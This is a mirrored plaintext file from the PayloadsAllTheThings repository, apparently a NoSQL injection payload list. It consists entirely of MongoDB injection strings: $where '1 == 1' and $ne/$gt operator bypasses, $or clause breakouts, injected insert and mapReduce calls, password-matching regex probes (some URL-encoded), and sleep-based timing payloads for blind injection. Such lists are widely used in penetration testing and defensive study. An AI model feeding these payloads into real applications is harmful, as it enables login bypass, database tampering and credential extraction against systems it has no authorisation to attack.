mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-04-28 09:35:01 +02:00
23 lines
611 B
Plaintext
23 lines
611 B
Plaintext
true, $where: '1 == 1'
|
|
, $where: '1 == 1'
|
|
$where: '1 == 1'
|
|
', $where: '1 == 1'
|
|
1, $where: '1 == 1'
|
|
{ $ne: 1 }
|
|
', $or: [ {}, { 'a':'a
|
|
' } ], $comment:'successful MongoDB injection'
|
|
db.injection.insert({success:1});
|
|
db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
|
|
|| 1==1
|
|
' && this.password.match(/.*/)//+%00
|
|
' && this.passwordzz.match(/.*/)//+%00
|
|
'%20%26%26%20this.password.match(/.*/)//+%00
|
|
'%20%26%26%20this.passwordzz.match(/.*/)//+%00
|
|
{$gt: ''}
|
|
{"$gt": ""}
|
|
[$ne]=1
|
|
';sleep(5000);
|
|
';sleep(5000);'
|
|
';sleep(5000);+'
|
|
';it=new%20Date();do{pt=new%20Date();}while(pt-it<5000);
|